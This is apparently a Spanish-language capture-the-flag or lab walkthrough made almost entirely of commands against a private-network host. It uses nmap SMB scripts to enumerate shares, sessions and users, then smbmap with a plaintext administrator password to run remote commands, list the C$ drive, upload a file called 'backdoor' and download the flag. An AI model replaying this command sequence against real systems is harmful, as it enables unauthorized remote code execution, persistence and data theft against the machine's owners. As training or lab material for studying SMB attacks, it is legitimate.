Primero hacemos un nmap
nmap 192.168.18.47
- Hacemos nmap más detallado
nmap -p445 --script smb* 192.168.18.47
- Utilizamos smbmap:
smbmap -u guest -p "" -d . -H 192.168.18.47
- Ahora como administrador:
smbmap -u administrator -p Temporal.23! -d . -H 192.168.18.47
- Ejecutamos comandos:
smbmap -u administrator -p Temporal.23! -H 192.168.18.47 -x whoami
smbmap -u administrator -p Temporal.23! -H 192.168.18.47 -x "ping 192.168.18.30"
tcpdump -niv enp0s5 icmp
- Listar discos:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! -L
- Listar contenidos de un disco:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! -r C$
- Subir un backdoor:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! --upload "./backdoor" "C$\backdoor"
- Nos bajamos la flag:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! --download "C$\flag.txt"
nmap 192.168.18.47
nmap -p445 --script smb-protocols 192.168.18.47
nmap -p445 --script smb-security-mode 192.168.18.47
nmap -p445 --script smb-enum-sessions 192.168.18.47
nmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-enum-shares 192.168.18.47
nmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47